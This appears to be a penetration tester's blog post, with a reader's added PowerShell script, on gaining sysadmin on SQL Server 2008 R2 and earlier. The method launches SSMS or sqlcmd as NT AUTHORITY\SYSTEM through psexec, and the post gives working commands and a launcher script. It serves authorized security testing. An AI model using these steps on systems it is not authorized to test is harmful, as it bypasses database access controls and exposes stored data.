While we, as penetration testers, love compromising systems during assessments, we all know the most important part of a penetration test is getting access to critical data and systems. So, post exploitation, I generally head for the database servers. However, depending on the permissions model of the target database, there may still be another hurdle to clear.
I have come across environments where administrators, even Domain Admins, did not have login rights to a Microsoft SQL Server instance even when logged on to the host locally. One method I previously used at that point was to work out which groups or accounts did have access and then add a new account or impersonate an authorized user. I have also spent time searching file shares and other servers for raw credentials to use with SQL Server Authentication. These approaches all work, but they eat up valuable time, a resource already in short supply during a penetration test.
While trying to find a better way, I discovered a method that cuts straight to the point and avoids wasting time on the other approaches. The NT AUTHORITY\SYSTEM account is a member of the sysadmin fixed server role by default on SQL Server 2008 R2 and earlier, so we can leverage that: any process running as SYSTEM on the database host can connect with Windows Authentication and get full control of the instance. The following steps can be performed after getting a Remote Desktop (terminal services) session on the SQL Server host with local administrator rights.
- Copy the standard psexec.exe binary (from the Sysinternals suite) onto the SQL Server host
- Start an elevated command prompt by right-clicking the Command Prompt shortcut and selecting 'Run as administrator'
- Start SQL Server Management Studio through psexec with the following options:
psexec -s -i "C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\VSShell\Common7\IDE\Ssms.exe"
(The -s switch starts the process as SYSTEM and -i runs it interactively on the current desktop, so the SSMS window actually appears in your session.)
(Note: the version directory depends on the release. SQL Server 2008 and 2008 R2 use 100; for SQL Server 2005 the path may be 90 rather than 100. On a 64-bit host the tools may also live under C:\Program Files rather than C:\Program Files (x86).)
After following the steps above, the SSMS "Connect to Server" dialog should appear. Choose Windows Authentication and connect to the local instance; the connection is made as NT AUTHORITY\SYSTEM, and you can confirm you have landed in sysadmin by running SELECT SUSER_SNAME(), IS_SRVROLEMEMBER('sysadmin'); in a new query window, which should return the SYSTEM login name and 1. At this point you can begin pillaging to your heart's content. This works for SQL Server 2008 R2 systems and before; starting with SQL Server 2012, SYSTEM is no longer granted sysadmin by default, so on newer versions this trick alone will not get you in.
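The procedure above, wrapped into a short PowerShell script as an added example (this is my code, not the original post's): it checks for psexec.exe in the current directory, looks for Ssms.exe under the 100 (2008/2008 R2) and 90 (2005) tool directories in both Program Files locations, and launches whichever it finds as SYSTEM. It assumes the script is run from an elevated prompt on the SQL Server host and that psexec.exe was copied into the working directory; the -accepteula switch is a standard PsExec option that suppresses the first-run licence dialog.

```powershell
# Added example: launch SSMS as NT AUTHORITY\SYSTEM via PsExec.
# Assumptions: elevated prompt on the SQL Server host, psexec.exe in the
# current directory, SQL Server 2005/2008/2008 R2 client tools installed.

$psexec = Join-Path (Get-Location) 'psexec.exe'
if (-not (Test-Path $psexec)) {
    throw "psexec.exe not found in $(Get-Location); copy it here first"
}

# Candidate tool roots: 32-bit tools on a 64-bit host sit under Program Files (x86),
# on a 32-bit host (or some installs) under Program Files.
$roots = @(${env:ProgramFiles(x86)}, $env:ProgramFiles) | Where-Object { $_ }

# Version directory by release: 100 = SQL Server 2008 / 2008 R2, 90 = SQL Server 2005.
$versions = @('100', '90')

$ssms = $null
foreach ($root in $roots) {
    foreach ($v in $versions) {
        $candidate = Join-Path $root "Microsoft SQL Server\$v\Tools\Binn\VSShell\Common7\IDE\Ssms.exe"
        if (Test-Path $candidate) {
            $ssms = $candidate
            break
        }
    }
    if ($ssms) { break }
}

if (-not $ssms) {
    throw 'Ssms.exe not found under the expected 90/100 tool paths; locate it manually'
}

Write-Host "Launching $ssms as SYSTEM"
# -accepteula: skip the Sysinternals EULA prompt
# -s:          run the process as the local SYSTEM account
# -i:          run interactively on the current desktop so the SSMS window is visible
& $psexec -accepteula -s -i $ssms
```

Once SSMS opens, connect with Windows Authentication to the local instance; the login will show as NT AUTHORITY\SYSTEM. If you do not want a GUI at all, the same technique applies to the command-line client that ships in the same tools directory (for example, psexec -accepteula -s "C:\Program Files\Microsoft SQL Server\100\Tools\Binn\SQLCMD.EXE" -E -Q "SELECT SUSER_SNAME(), IS_SRVROLEMEMBER('sysadmin')"); that sqlcmd variant is my addition and is not covered by the original post.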
*Thank you to Argenis Fernandez for his article, which provided an invaluable reference on how to perform this.